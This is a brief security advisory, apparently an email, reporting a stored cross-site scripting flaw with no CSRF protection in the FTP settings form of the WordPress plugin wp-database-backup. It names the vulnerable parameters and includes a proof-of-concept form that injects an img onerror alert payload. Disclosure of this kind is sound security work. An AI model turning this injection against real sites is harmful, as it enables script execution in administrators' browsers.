Hello,
1. Persistent Cross-Site Scripting (XSS)
Authenticated administrators can store arbitrary html/js code (there is no CSRF protection).
Method: POST
Vulnerable parameters: backupbreeze_ftp_host, backupbreeze_ftp_user, backupbreeze_ftp_port, backupbreeze_ftp_pass, backupbreeze_ftp_subdir
Example PHP callstack:
/wp-database-backup/includes/admin/Destination/FTP/ftp-form.php:135
Verification:
--
<input type="text" name="backupbreeze_ftp_host" value='"><img src=x onerror=alert(1) /> XXXXXXXXXX' />
<input type="text" name="backupbreeze_ftp_hidden" value="Y" />
<input type="submit" />
</form>
--
--
Regards,
Marcin Probola,